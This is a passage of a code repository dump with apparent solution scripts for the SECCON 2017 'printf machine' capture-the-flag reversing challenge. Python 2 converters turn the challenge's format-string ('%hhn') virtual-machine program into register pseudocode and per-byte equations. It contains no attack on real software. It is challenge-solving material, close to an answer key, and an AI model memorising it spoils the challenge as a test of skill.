| x/32c $rbp-0x460 32 | c 33 | x/32c $rbp-0x460 34 | c 35 | x/32c $rbp-0x460 36 | -------------------------------------------------------------------------------- /seccon2017/printfmachine/add_debug.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import sys 4 | import re 5 | 6 | t = open(sys.argv[1]).read() 7 | o = open('debug.fs', 'wb') 8 | for l in t.split('\n'): 9 | o.write(l + '\n') 10 | for fmt in l.split('%'): 11 | if 'hhn' in fmt: 12 | m = re.match('(\d+)\$hhn', fmt) 13 | # o.write('flag: "%56$s"\n') 14 | 15 | for i in range(1, 65): 16 | s = 'flag: "%' + str(i) + '$x"\n' 17 | print s 18 | o.write(s) 19 | 20 | o.close() 21 | -------------------------------------------------------------------------------- /seccon2017/printfmachine/code.fs: -------------------------------------------------------------------------------- 1 | swap(&i[0], &i[13]) 2 | swap(&i[1], &i[7]) 3 | swap(&i[2], &i[10]) 4 | swap(&i[5], &i[10]) 5 | swap(&i[6], &i[14]) 6 | swap(&i[7], &i[15]) 7 | swap(&i[9], &i[14]) 8 | swap(&i[10], &i[15]) 9 | swap(&i[12], &i[14]) 10 | swap(&i[13], &i[15]) 11 | swap(&i[14], &i[15]) 12 | r[2] = 0 13 | r[3] = 0 14 | input = r[8] = i[0] 15 | r[2] += 220x 16 | r[3] = 0 17 | input = r[8] = i[1] 18 | r[2] += 14x 19 | r[3] = 0 20 | input = r[8] = i[2] 21 | r[2] += 22x 22 | r[3] = 0 23 | input = r[8] = i[3] 24 | r[2] += 235x 25 | r[3] = 0 26 | input = r[8] = i[4] 27 | r[2] += 183x 28 | r[3] = 0 29 | input = r[8] = i[5] 30 | r[2] += 129x 31 | r[3] = 0 32 | input = r[8] = i[6] 33 | r[2] += 245x 34 | r[3] = 0 35 | input = r[8] = i[7] 36 | r[2] += 145x 37 | r[3] = 0 38 | input = r[8] = i[8] 39 | r[2] += 25x 40 | r[3] = 0 41 | input = r[8] = i[9] 42 | r[2] += 113x 43 | r[3] = 0 44 | input = r[8] = i[10] 45 | r[2] += 235x 46 | r[3] = 0 47 | input = r[8] = i[11] 48 | r[2] += 35x 49 | r[3] = 0 50 | input = r[8] = i[12] 51 | r[2] += 246x 52 | r[3] = 0 53 | input = r[8] = i[13] 54 | r[2] += 240x 55 | r[3] = 0 56 | input = r[8] = i[14] 57 | r[2] += 93x 58 | r[3] = 0 59 | input = r[8] = i[15] 60 | r[2] += 107x 61 | r[0] = r[2] + 110 62 | r[4] = len(&r[0]) 63 | r[15] = r[15] + r[4] 64 | r[2] = 0 65 | r[3] = 0 66 | input = r[8] = i[0] 67 | r[2] += 0x 68 | r[3] = 0 69 | input = r[8] = i[1] 70 | r[2] += 152x 71 | r[3] = 0 72 | input = r[8] = i[2] 73 | r[2] += 34x 74 | r[3] = 0 75 | input = r[8] = i[3] 76 | r[2] += 136x 77 | r[3] = 0 78 | input = r[8] = i[4] 79 | r[2] += 253x 80 | r[3] = 0 81 | input = r[8] = i[5] 82 | r[2] += 131x 83 | r[3] = 0 84 | input = r[8] = i[6] 85 | r[2] += 123x 86 | r[3] = 0 87 | input = r[8] = i[7] 88 | r[2] += 165x 89 | r[3] = 0 90 | input = r[8] = i[8] 91 | r[2] += 232x 92 | r[3] = 0 93 | input = r[8] = i[9] 94 | r[2] += 231x 95 | r[3] = 0 96 | input = r[8] = i[10] 97 | r[2] += 182x 98 | r[3] = 0 99 | input = r[8] = i[11] 100 | r[2] += 18x 101 | r[3] = 0 102 | input = r[8] = i[12] 103 | r[2] += 220x 104 | r[3] = 0 105 | input = r[8] = i[13] 106 | r[2] += 171x 107 | r[3] = 0 108 | input = r[8] = i[14] 109 | r[2] += 69x 110 | r[3] = 0 111 | input = r[8] = i[15] 112 | r[2] += 75x 113 | r[0] = r[2] + 115 114 | r[4] = len(&r[0]) 115 | r[15] = r[15] + r[4] 116 | r[2] = 0 117 | r[3] = 0 118 | input = r[8] = i[0] 119 | r[2] += 43x 120 | r[3] = 0 121 | input = r[8] = i[1] 122 | r[2] += 219x 123 | r[3] = 0 124 | input = r[8] = i[2] 125 | r[2] += 165x 126 | r[3] = 0 127 | input = r[8] = i[3] 128 | r[2] += 225x 129 | r[3] = 0 130 | input = r[8] = i[4] 131 | r[2] += 193x 132 | r[3] = 0 133 | input = r[8] = i[5] 134 | r[2] += 11x 135 | r[3] = 0 136 | input = r[8] = i[6] 137 | r[2] += 248x 138 | r[3] = 0 139 | input = r[8] = i[7] 140 | r[2] += 28x 141 | r[3] = 0 142 | input = r[8] = i[8] 143 | r[2] += 86x 144 | r[3] = 0 145 | input = r[8] = i[9] 146 | r[2] += 5x 147 | r[3] = 0 148 | input = r[8] = i[10] 149 | r[2] += 198x 150 | r[3] = 0 151 | input = r[8] = i[11] 152 | r[2] += 56x 153 | r[3] = 0 154 | input = r[8] = i[12] 155 | r[2] += 212x 156 | r[3] = 0 157 | input = r[8] = i[13] 158 | r[2] += 218x 159 | r[3] = 0 160 | input = r[8] = i[14] 161 | r[2] += 18x 162 | r[3] = 0 163 | input = r[8] = i[15] 164 | r[2] += 154x 165 | r[0] = r[2] + 95 166 | r[4] = len(&r[0]) 167 | r[15] = r[15] + r[4] 168 | r[2] = 0 169 | r[3] = 0 170 | input = r[8] = i[0] 171 | r[2] += 8x 172 | r[3] = 0 173 | input = r[8] = i[1] 174 | r[2] += 79x 175 | r[3] = 0 176 | input = r[8] = i[2] 177 | r[2] += 96x 178 | r[3] = 0 179 | input = r[8] = i[3] 180 | r[2] += 233x 181 | r[3] = 0 182 | input = r[8] = i[4] 183 | r[2] += 169x 184 | r[3] = 0 185 | input = r[8] = i[5] 186 | r[2] += 183x 187 | r[3] = 0 188 | input = r[8] = i[6] 189 | r[2] += 226x 190 | r[3] = 0 191 | input = r[8] = i[7] 192 | r[2] += 188x 193 | r[3] = 0 194 | input = r[8] = i[8] 195 | r[2] += 205x 196 | r[3] = 0 197 | input = r[8] = i[9] 198 | r[2] += 20x 199 | r[3] = 0 200 | input = r[8] = i[10] 201 | r[2] += 56x 202 | r[3] = 0 203 | input = r[8] = i[11] 204 | r[2] += 119x 205 | r[3] = 0 206 | input = r[8] = i[12] 207 | r[2] += 110x 208 | r[3] = 0 209 | input = r[8] = i[13] 210 | r[2] += 52x 211 | r[3] = 0 212 | input = r[8] = i[14] 213 | r[2] += 233x 214 | r[3] = 0 215 | input = r[8] = i[15] 216 | r[2] += 146x 217 | r[0] = r[2] + 144 218 | r[4] = len(&r[0]) 219 | r[15] = r[15] + r[4] 220 | r[2] = 0 221 | r[3] = 0 222 | input = r[8] = i[0] 223 | r[2] += 197x 224 | r[3] = 0 225 | input = r[8] = i[1] 226 | r[2] += 241x 227 | r[3] = 0 228 | input = r[8] = i[2] 229 | r[2] += 177x 230 | r[3] = 0 231 | input = r[8] = i[3] 232 | r[2] += 75x 233 | r[3] = 0 234 | input = r[8] = i[4] 235 | r[2] += 107x 236 | r[3] = 0 237 | input = r[8] = i[5] 238 | r[2] += 76x 239 | r[3] = 0 240 | input = r[8] = i[6] 241 | r[2] += 68x 242 | r[3] = 0 243 | input = r[8] = i[7] 244 | r[2] += 208x 245 | r[3] = 0 246 | input = r[8] = i[8] 247 | r[2] += 102x 248 | r[3] = 0 249 | input = r[8] = i[9] 250 | r[2] += 110x 251 | r[3] = 0 252 | input = r[8] = i[10] 253 | r[2] += 26x 254 | r[3] = 0 255 | input = r[8] = i[11] 256 | r[2] += 83x 257 | r[3] = 0 258 | input = r[8] = i[12] 259 | r[2] += 17x 260 | r[3] = 0 261 | input = r[8] = i[13] 262 | r[2] += 26x 263 | r[3] = 0 264 | input = r[8] = i[14] 265 | r[2] += 57x 266 | r[3] = 0 267 | input = r[8] = i[15] 268 | r[2] += 63x 269 | r[0] = r[2] + 92 270 | r[4] = len(&r[0]) 271 | r[15] = r[15] + r[4] 272 | r[2] = 0 273 | r[3] = 0 274 | input = r[8] = i[0] 275 | r[2] += 205x 276 | r[3] = 0 277 | input = r[8] = i[1] 278 | r[2] += 148x 279 | r[3] = 0 280 | input = r[8] = i[2] 281 | r[2] += 209x 282 | r[3] = 0 283 | input = r[8] = i[3] 284 | r[2] += 248x 285 | r[3] = 0 286 | input = r[8] = i[4] 287 | r[2] += 18x 288 | r[3] = 0 289 | input = r[8] = i[5] 290 | r[2] += 142x 291 | r[3] = 0 292 | input = r[8] = i[6] 293 | r[2] += 67x 294 | r[3] = 0 295 | input = r[8] = i[7] 296 | r[2] += 53x 297 | r[3] = 0 298 | input = r[8] = i[8] 299 | r[2] += 80x 300 | r[3] = 0 301 | input = r[8] = i[9] 302 | r[2] += 174x 303 | r[3] = 0 304 | input = r[8] = i[10] 305 | r[2] += 123x 306 | r[3] = 0 307 | input = r[8] = i[11] 308 | r[2] += 194x 309 | r[3] = 0 310 | input = r[8] = i[12] 311 | r[2] += 201x 312 | r[3] = 0 313 | input = r[8] = i[13] 314 | r[2] += 223x 315 | r[3] = 0 316 | input = r[8] = i[14] 317 | r[2] += 84x 318 | r[3] = 0 319 | input = r[8] = i[15] 320 | r[2] += 47x 321 | r[0] = r[2] + 206 322 | r[4] = len(&r[0]) 323 | r[15] = r[15] + r[4] 324 | r[2] = 0 325 | r[3] = 0 326 | input = r[8] = i[0] 327 | r[2] += 68x 328 | r[3] = 0 329 | input = r[8] = i[1] 330 | r[2] += 120x 331 | r[3] = 0 332 | input = r[8] = i[2] 333 | r[2] += 89x 334 | r[3] = 0 335 | input = r[8] = i[3] 336 | r[2] += 96x 337 | r[3] = 0 338 | input = r[8] = i[4] 339 | r[2] += 153x 340 | r[3] = 0 341 | input = r[8] = i[5] 342 | r[2] += 29x 343 | r[3] = 0 344 | input = r[8] = i[6] 345 | r[2] += 37x 346 | r[3] = 0 347 | input = r[8] = i[7] 348 | r[2] += 218x 349 | r[3] = 0 350 | input = r[8] = i[8] 351 | r[2] += 101x 352 | r[3] = 0 353 | input = r[8] = i[9] 354 | r[2] += 117x 355 | r[3] = 0 356 | input = r[8] = i[10] 357 | r[2] += 248x 358 | r[3] = 0 359 | input = r[8] = i[11] 360 | r[2] += 65x 361 | r[3] = 0 362 | input = r[8] = i[12] 363 | r[2] += 140x 364 | r[3] = 0 365 | input = r[8] = i[13] 366 | r[2] += 43x 367 | r[3] = 0 368 | input = r[8] = i[14] 369 | r[2] += 239x 370 | r[3] = 0 371 | input = r[8] = i[15] 372 | r[2] += 106x 373 | r[0] = r[2] + 205 374 | r[4] = len(&r[0]) 375 | r[15] = r[15] + r[4] 376 | r[2] = 0 377 | r[3] = 0 378 | input = r[8] = i[0] 379 | r[2] += 14x 380 | r[3] = 0 381 | input = r[8] = i[1] 382 | r[2] += 218x 383 | r[3] = 0 384 | input = r[8] = i[2] 385 | r[2] += 92x 386 | r[3] = 0 387 | input = r[8] = i[3] 388 | r[2] += 251x 389 | r[3] = 0 390 | input = r[8] = i[4] 391 | r[2] += 91x 392 | r[3] = 0 393 | input = r[8] = i[5] 394 | r[2] += 29x 395 | r[3] = 0 396 | input = r[8] = i[6] 397 | r[2] += 155x 398 | r[3] = 0 399 | input = r[8] = i[7] 400 | r[2] += 16x 401 | r[3] = 0 402 | input = r[8] = i[8] 403 | r[2] += 31x 404 | r[3] = 0 405 | input = r[8] = i[9] 406 | r[2] += 1x 407 | r[3] = 0 408 | input = r[8] = i[10] 409 | r[2] += 118x 410 | r[3] = 0 411 | input = r[8] = i[11] 412 | r[2] += 214x 413 | r[3] = 0 414 | input = r[8] = i[12] 415 | r[2] += 220x 416 | r[3] = 0 417 | input = r[8] = i[13] 418 | r[2] += 174x 419 | r[3] = 0 420 | input = r[8] = i[14] 421 | r[2] += 159x 422 | r[3] = 0 423 | input = r[8] = i[15] 424 | r[2] += 70x 425 | r[0] = r[2] + 111 426 | r[4] = len(&r[0]) 427 | r[15] = r[15] + r[4] 428 | r[2] = 0 429 | r[3] = 0 430 | input = r[8] = i[0] 431 | r[2] += 196x 432 | r[3] = 0 433 | input = r[8] = i[1] 434 | r[2] += 24x 435 | r[3] = 0 436 | input = r[8] = i[2] 437 | r[2] += 230x 438 | r[3] = 0 439 | input = r[8] = i[3] 440 | r[2] += 117x 441 | r[3] = 0 442 | input = r[8] = i[4] 443 | r[2] += 133x 444 | r[3] = 0 445 | input = r[8] = i[5] 446 | r[2] += 191x 447 | r[3] = 0 448 | input = r[8] = i[6] 449 | r[2] += 90x 450 | r[3] = 0 451 | input = r[8] = i[7] 452 | r[2] += 84x 453 | r[3] = 0 454 | input = r[8] = i[8] 455 | r[2] += 61x 456 | r[3] = 0 457 | input = r[8] = i[9] 458 | r[2] += 82x 459 | r[3] = 0 460 | input = r[8] = i[10] 461 | r[2] += 19x 462 | r[3] = 0 463 | input = r[8] = i[11] 464 | r[2] += 216x 465 | r[3] = 0 466 | input = r[8] = i[12] 467 | r[2] += 93x 468 | r[3] = 0 469 | input = r[8] = i[13] 470 | r[2] += 95x 471 | r[3] = 0 472 | input = r[8] = i[14] 473 | r[2] += 128x 474 | r[3] = 0 475 | input = r[8] = i[15] 476 | r[2] += 161x 477 | r[0] = r[2] + 233 478 | r[4] = len(&r[0]) 479 | r[15] = r[15] + r[4] 480 | r[2] = 0 481 | r[3] = 0 482 | input = r[8] = i[0] 483 | r[2] += 80x 484 | r[3] = 0 485 | input = r[8] = i[1] 486 | r[2] += 23x 487 | r[3] = 0 488 | input = r[8] = i[2] 489 | r[2] += 133x 490 | r[3] = 0 491 | input = r[8] = i[3] 492 | r[2] += 17x 493 | r[3] = 0 494 | input = r[8] = i[4] 495 | r[2] += 58x 496 | r[3] = 0 497 | input = r[8] = i[5] 498 | r[2] += 134x 499 | r[3] = 0 500 | input = r[8] = i[6] 501 | r[2] += 204x 502 | r[3] = 0 503 | input = r[8] = i[7] 504 | r[2] += 222x 505 | r[3] = 0 506 | input = r[8] = i[8] 507 | r[2] += 245x 508 | r[3] = 0 509 | input = r[8] = i[9] 510 | r[2] += 66x 511 | r[3] = 0 512 | input = r[8] = i[10] 513 | r[2] += 223x 514 | r[3] = 0 515 | input = r[8] = i[11] 516 | r[2] += 96x 517 | r[3] = 0 518 | input = r[8] = i[12] 519 | r[2] += 153x 520 | r[3] = 0 521 | input = r[8] = i[13] 522 | r[2] += 76x 523 | r[3] = 0 524 | input = r[8] = i[14] 525 | r[2] += 189x 526 | r[3] = 0 527 | input = r[8] = i[15] 528 | r[2] += 4x 529 | r[0] = r[2] + 166 530 | r[4] = len(&r[0]) 531 | r[15] = r[15] + r[4] 532 | r[2] = 0 533 | r[3] = 0 534 | input = r[8] = i[0] 535 | r[2] += 96x 536 | r[3] = 0 537 | input = r[8] = i[1] 538 | r[2] += 116x 539 | r[3] = 0 540 | input = r[8] = i[2] 541 | r[2] += 110x 542 | r[3] = 0 543 | input = r[8] = i[3] 544 | r[2] += 226x 545 | r[3] = 0 546 | input = r[8] = i[4] 547 | r[2] += 57x 548 | r[3] = 0 549 | input = r[8] = i[5] 550 | r[2] += 112x 551 | r[3] = 0 552 | input = r[8] = i[6] 553 | r[2] += 132x 554 | r[3] = 0 555 | input = r[8] = i[7] 556 | r[2] += 185x 557 | r[3] = 0 558 | input = r[8] = i[8] 559 | r[2] += 234x 560 | r[3] = 0 561 | input = r[8] = i[9] 562 | r[2] += 30x 563 | r[3] = 0 564 | input = r[8] = i[10] 565 | r[2] += 167x 566 | r[3] = 0 567 | input = r[8] = i[11] 568 | r[2] += 5x 569 | r[3] = 0 570 | input = r[8] = i[12] 571 | r[2] += 171x 572 | r[3] = 0 573 | input = r[8] = i[13] 574 | r[2] += 222x 575 | r[3] = 0 576 | input = r[8] = i[14] 577 | r[2] += 137x 578 | r[3] = 0 579 | input = r[8] = i[15] 580 | r[2] += 54x 581 | r[0] = r[2] + 41 582 | r[4] = len(&r[0]) 583 | r[15] = r[15] + r[4] 584 | r[2] = 0 585 | r[3] = 0 586 | input = r[8] = i[0] 587 | r[2] += 68x 588 | r[3] = 0 589 | input = r[8] = i[1] 590 | r[2] += 71x 591 | r[3] = 0 592 | input = r[8] = i[2] 593 | r[2] += 197x 594 | r[3] = 0 595 | input = r[8] = i[3] 596 | r[2] += 155x 597 | r[3] = 0 598 | input = r[8] = i[4] 599 | r[2] += 88x 600 | r[3] = 0 601 | input = r[8] = i[5] 602 | r[2] += 188x 603 | r[3] = 0 604 | input = r[8] = i[6] 605 | r[2] += 220x 606 | r[3] = 0 607 | input = r[8] = i[7] 608 | r[2] += 8x 609 | r[3] = 0 610 | input = r[8] = i[8] 611 | r[2] += 22x 612 | r[3] = 0 613 | input = r[8] = i[9] 614 | r[2] += 42x 615 | r[3] = 0 616 | input = r[8] = i[10] 617 | r[2] += 188x 618 | r[3] = 0 619 | input = r[8] = i[11] 620 | r[2] += 64x 621 | r[3] = 0 622 | input = r[8] = i[12] 623 | r[2] += 23x 624 | r[3] = 0 625 | input = r[8] = i[13] 626 | r[2] += 27x 627 | r[3] = 0 628 | input = r[8] = i[14] 629 | r[2] += 64x 630 | r[3] = 0 631 | input = r[8] = i[15] 632 | r[2] += 204x 633 | r[0] = r[2] + 60 634 | r[4] = len(&r[0]) 635 | r[15] = r[15] + r[4] 636 | r[2] = 0 637 | r[3] = 0 638 | input = r[8] = i[0] 639 | r[2] += 95x 640 | r[3] = 0 641 | input = r[8] = i[1] 642 | r[2] += 144x 643 | r[3] = 0 644 | input = r[8] = i[2] 645 | r[2] += 238x 646 | r[3] = 0 647 | input = r[8] = i[3] 648 | r[2] += 1x 649 | r[3] = 0 650 | input = r[8] = i[4] 651 | r[2] += 67x 652 | r[3] = 0 653 | input = r[8] = i[5] 654 | r[2] += 18x 655 | r[3] = 0 656 | input = r[8] = i[6] 657 | r[2] += 231x 658 | r[3] = 0 659 | input = r[8] = i[7] 660 | r[2] += 29x 661 | r[3] = 0 662 | input = r[8] = i[8] 663 | r[2] += 18x 664 | r[3] = 0 665 | input = r[8] = i[9] 666 | r[2] += 243x 667 | r[3] = 0 668 | input = r[8] = i[10] 669 | r[2] += 250x 670 | r[3] = 0 671 | input = r[8] = i[11] 672 | r[2] += 119x 673 | r[3] = 0 674 | input = r[8] = i[12] 675 | r[2] += 66x 676 | r[3] = 0 677 | input = r[8] = i[13] 678 | r[2] += 56x 679 | r[3] = 0 680 | input = r[8] = i[14] 681 | r[2] += 12x 682 | r[3] = 0 683 | input = r[8] = i[15] 684 | r[2] += 110x 685 | r[0] = r[2] + 20 686 | r[4] = len(&r[0]) 687 | r[15] = r[15] + r[4] 688 | r[2] = 0 689 | r[3] = 0 690 | input = r[8] = i[0] 691 | r[2] += 188x 692 | r[3] = 0 693 | input = r[8] = i[1] 694 | r[2] += 219x 695 | r[3] = 0 696 | input = r[8] = i[2] 697 | r[2] += 205x 698 | r[3] = 0 699 | input = r[8] = i[3] 700 | r[2] += 136x 701 | r[3] = 0 702 | input = r[8] = i[4] 703 | r[2] += 205x 704 | r[3] = 0 705 | input = r[8] = i[5] 706 | r[2] += 232x 707 | r[3] = 0 708 | input = r[8] = i[6] 709 | r[2] += 25x 710 | r[3] = 0 711 | input = r[8] = i[7] 712 | r[2] += 192x 713 | r[3] = 0 714 | input = r[8] = i[8] 715 | r[2] += 72x 716 | r[3] = 0 717 | input = r[8] = i[9] 718 | r[2] += 94x 719 | r[3] = 0 720 | input = r[8] = i[10] 721 | r[2] += 148x 722 | r[3] = 0 723 | input = r[8] = i[11] 724 | r[2] += 141x 725 | r[3] = 0 726 | input = r[8] = i[12] 727 | r[2] += 59x 728 | r[3] = 0 729 | input = r[8] = i[13] 730 | r[2] += 0x 731 | r[3] = 0 732 | input = r[8] = i[14] 733 | r[2] += 195x 734 | r[3] = 0 735 | input = r[8] = i[15] 736 | r[2] += 98x 737 | r[0] = r[2] + 223 738 | r[4] = len(&r[0]) 739 | r[15] = r[15] + r[4] 740 | r[2] = 0 741 | r[3] = 0 742 | input = r[8] = i[0] 743 | r[2] += 107x 744 | r[3] = 0 745 | input = r[8] = i[1] 746 | r[2] += 196x 747 | r[3] = 0 748 | input = r[8] = i[2] 749 | r[2] += 112x 750 | r[3] = 0 751 | input = r[8] = i[3] 752 | r[2] += 47x 753 | r[3] = 0 754 | input = r[8] = i[4] 755 | r[2] += 237x 756 | r[3] = 0 757 | input = r[8] = i[5] 758 | r[2] += 172x 759 | r[3] = 0 760 | input = r[8] = i[6] 761 | r[2] += 223x 762 | r[3] = 0 763 | input = r[8] = i[7] 764 | r[2] += 90x 765 | r[3] = 0 766 | input = r[8] = i[8] 767 | r[2] += 242x 768 | r[3] = 0 769 | input = r[8] = i[9] 770 | r[2] += 207x 771 | r[3] = 0 772 | input = r[8] = i[10] 773 | r[2] += 163x 774 | r[3] = 0 775 | input = r[8] = i[11] 776 | r[2] += 117x 777 | r[3] = 0 778 | input = r[8] = i[12] 779 | r[2] += 162x 780 | r[3] = 0 781 | input = r[8] = i[13] 782 | r[2] += 128x 783 | r[3] = 0 784 | input = r[8] = i[14] 785 | r[2] += 50x 786 | r[3] = 0 787 | input = r[8] = i[15] 788 | r[2] += 139x 789 | r[0] = r[2] + 247 790 | r[4] = len(&r[0]) 791 | r[15] = r[15] + r[4] 792 | r[2] = 0 793 | r[3] = 0 794 | input = r[8] = i[0] 795 | r[2] += 44x 796 | r[3] = 0 797 | input = r[8] = i[1] 798 | r[2] += 185x 799 | r[3] = 0 800 | input = r[8] = i[2] 801 | r[2] += 38x 802 | r[3] = 0 803 | input = r[8] = i[3] 804 | r[2] += 75x 805 | r[3] = 0 806 | input = r[8] = i[4] 807 | r[2] += 115x 808 | r[3] = 0 809 | input = r[8] = i[5] 810 | r[2] += 112x 811 | r[3] = 0 812 | input = r[8] = i[6] 813 | r[2] += 160x 814 | r[3] = 0 815 | input = r[8] = i[7] 816 | r[2] += 161x 817 | r[3] = 0 818 | input = r[8] = i[8] 819 | r[2] += 178x 820 | r[3] = 0 821 | input = r[8] = i[9] 822 | r[2] += 46x 823 | r[3] = 0 824 | input = r[8] = i[10] 825 | r[2] += 218x 826 | r[3] = 0 827 | input = r[8] = i[11] 828 | r[2] += 239x 829 | r[3] = 0 830 | input = r[8] = i[12] 831 | r[2] += 160x 832 | r[3] = 0 833 | input = r[8] = i[13] 834 | r[2] += 254x 835 | r[3] = 0 836 | input = r[8] = i[14] 837 | r[2] += 59x 838 | r[3] = 0 839 | input = r[8] = i[15] 840 | r[2] += 137x 841 | r[0] = r[2] + 80 842 | r[4] = len(&r[0]) 843 | r[15] = r[15] + r[4] -------------------------------------------------------------------------------- /seccon2017/printfmachine/convert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import re 4 | import sys 5 | 6 | def convert(i): 7 | if 0 < i <= 16: 8 | return 'r', 0, i - 1 9 | elif 16 < i <= 32: 10 | return 'i', 16, i - 16 - 1 11 | elif 32 < i <= 48: 12 | return 'r', 32, i - 32 - 1 13 | else: 14 | return 'i', 48, i - 48 - 1 15 | 16 | t = open(sys.argv[1]).read() 17 | out = [] 18 | for l in t.split('\n'): 19 | m = re.match('^\%(\d+)\$\*(\d+)\$s\%(\d+)\$hhn$', l) 20 | if m is not None: 21 | r, i, o = m.groups() 22 | r, i, o = int(r), int(i), int(o) 23 | # print r, i, o 24 | assert o <= 32 25 | assert 32 < i <= 64 26 | os, obase, oval = convert(o) 27 | iss, ibase, ival = convert(i) 28 | 29 | out.append('%s[%d] = %s[%d]' % (os, oval, iss, ival)) 30 | continue 31 | 32 | m = re.match('^\%(\d+)\$hhn$', l) 33 | if m is not None: 34 | r = int(m.groups()[0]) 35 | os, obase, oval = convert(r) 36 | out.append('%s[%d] = 0' %(os, oval)) 37 | continue 38 | 39 | m = re.match('^\%(\d+)\$\*(\d+)\$s\%(\d+)\$\*(\d+)\$s\%(\d+)\$hhn$', l) 40 | if m is not None: 41 | _, i1, _, i2, o = m.groups() 42 | i1, i2, o = int(i1), int(i2), int(o) 43 | i1s, i1sbase, i1val = convert(i1) 44 | i2s, i2sbase, i2val = convert(i2) 45 | os, osbase, oval = convert(o) 46 | out.append('%s[%d] = %s[%d] + %s[%d]' % (os, oval, i1s, i1val, i2s, i2val)) 47 | continue 48 | 49 | m = re.match('^\%(\d+)\$hhn\%(\d+)\$\*(\d+)\$s\%(\d+)\$hhn$', l) 50 | if m is not None: 51 | z, _, i, o = m.groups() 52 | z, i, o = int(z), int(i), int(o) 53 | zs, _, zval = convert(z) 54 | iss, _, ival = convert(i) 55 | os, _, oval = convert(o) 56 | out.append('%s[%d] = 0' % (zs, zval)) 57 | out.append('%s[%d] = %s[%d]' % (os, oval, iss, ival)) 58 | continue 59 | 60 | m = re.match('^\%(\d+)\$s\%(\d+)\$hhn$', l) 61 | if m is not None: 62 | i, o = m.groups() 63 | i, o = int(i), int(o) 64 | iss, _, ival = convert(i) 65 | os, _, oval = convert(o) 66 | out.append('%s[%d] = len(&%s[%d])' % (os, oval, iss, ival)) 67 | continue 68 | 69 | m = re.match('^\%(\d+)\$\*(\d+)\$s\%(\d+)\$(\d+)s\%(\d+)\$hhn$', l) 70 | if m is not None: 71 | _, i, _, c, o = m.groups() 72 | i, c, o = int(i), int(c), int(o) 73 | iss, _, ival = convert(i) 74 | os, _, oval = convert(o) 75 | out.append('%s[%d] = %s[%d] + %d' % (os, oval, iss, ival, c)) 76 | continue 77 | 78 | out.append(l) 79 | 80 | open(sys.argv[2], 'w').write('\n'.join(out)) 81 | -------------------------------------------------------------------------------- /seccon2017/printfmachine/convert2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import re 4 | import sys 5 | 6 | t = open(sys.argv[1]).read() 7 | tl = t.split('\n') 8 | out = [] 9 | i = 0 10 | while i < len(tl): 11 | l = tl[i] 12 | m = re.match('r\[3\] = i\[(\d+)\]', l) 13 | if m is not None: 14 | i1 = int(m.groups()[0]) 15 | m = re.match('i\[(\d+)\] = i\[(\d+)\]', tl[i+1]) 16 | if m is not None: 17 | i2, i3 = int(m.groups()[0]), int(m.groups()[1]) 18 | m = re.match('i\[(\d+)\] = r\[3\]', tl[i+2]) 19 | if m is not None: 20 | i4 = int(m.groups()[0]) 21 | if i1 == i2 and i3 == i4: 22 | out.append('swap(&i[%d], &i[%d])' % (i2, i3)) 23 | i += 3 24 | continue 25 | 26 | if tl[i] == 'r[3] = 0': 27 | out.append(tl[i]) 28 | i += 1 29 | out.append('input = ' + tl[i]) 30 | i += 1 31 | 32 | vv = 0 33 | s = 1 34 | while True: 35 | while tl[i] == 'r[8] = r[8] + r[8]': 36 | s *= 2 37 | i += 1 38 | 39 | # out.append(str(s)) 40 | if tl[i] == 'r[3] = r[3] + r[8]': 41 | vv += s 42 | i += 1 43 | continue 44 | 45 | break 46 | 47 | out.append('r[2] += %dx' % (vv,)) 48 | i += 1 49 | continue 50 | 51 | i += 1 52 | out.append(l) 53 | 54 | open(sys.argv[2], 'w').write('\n'.join(out)) 55 | -------------------------------------------------------------------------------- /seccon2017/printfmachine/convert3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import re 4 | import sys 5 | 6 | t = open(sys.argv[1]).read() 7 | tl = t.split('\n') 8 | out = [] 9 | i = 0 10 | vals = [] 11 | 12 | while i < len(tl): 13 | if 'input = ' in tl[i]: 14 | l = tl[i] 15 | n = l[len('input = r[8] = i['):] 16 | n = int(n[:n.index(']')]) 17 | 18 | i += 1 19 | l = tl[i] 20 | v = int(l[len('r[2] += '):l.index('x')]) 21 | vals.append(v) 22 | continue 23 | 24 | if 'r[0] = r[2] + ' in tl[i]: 25 | l = tl[i] 26 | opp = int(l[len('r[0] = r[2] + '):]) 27 | 28 | final_v = 256 - opp 29 | print 'res.append((' + str(vals) + ', ' + str(final_v) + '))' 30 | 31 | vals = [] 32 | i += 1 33 | continue 34 | 35 | i += 1 36 | -------------------------------------------------------------------------------- /seccon2017/printfmachine/fsmachine: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/seccon2017/printfmachine/fsmachine -------------------------------------------------------------------------------- /seccon2017/printfmachine/out.fs: -------------------------------------------------------------------------------- 1 | r[3] = i[0] 2 | i[0] = i[13] 3 | i[13] = r[3] 4 | r[3] = i[1] 5 | i[1] = i[7] 6 | i[7] = r[3] 7 | r[3] = i[2] 8 | i[2] = i[10] 9 | i[10] = r[3] 10 | r[3] = i[5] 11 | i[5] = i[10] 12 | i[10] = r[3] 13 | r[3] = i[6] 14 | i[6] = i[14] 15 | i[14] = r[3] 16 | r[3] = i[7] 17 | i[7] = i[15] 18 | i[15] = r[3] 19 | r[3] = i[9] 20 | i[9] = i[14] 21 | i[14] = r[3] 22 | r[3] = i[10] 23 | i[10] = i[15] 24 | i[15] = r[3] 25 | r[3] = i[12] 26 | i[12] = i[14] 27 | i[14] = r[3] 28 | r[3] = i[13] 29 | i[13] = i[15] 30 | i[15] = r[3] 31 | r[3] = i[14] 32 | i[14] = i[15] 33 | i[15] = r[3] 34 | r[2] = 0 35 | r[3] = 0 36 | r[8] = i[0] 37 | r[8] = r[8] + r[8] 38 | r[8] = r[8] + r[8] 39 | r[3] = r[3] + r[8] 40 | r[8] = r[8] + r[8] 41 | r[3] = r[3] + r[8] 42 | r[8] = r[8] + r[8] 43 | r[3] = r[3] + r[8] 44 | r[8] = r[8] + r[8] 45 | r[8] = r[8] + r[8] 46 | r[3] = r[3] + r[8] 47 | r[8] = r[8] + r[8] 48 | r[3] = r[3] + r[8] 49 | r[8] = r[8] + r[8] 50 | r[2] = r[2] + r[3] 51 | r[3] = 0 52 | r[8] = i[1] 53 | r[8] = r[8] + r[8] 54 | r[3] = r[3] + r[8] 55 | r[8] = r[8] + r[8] 56 | r[3] = r[3] + 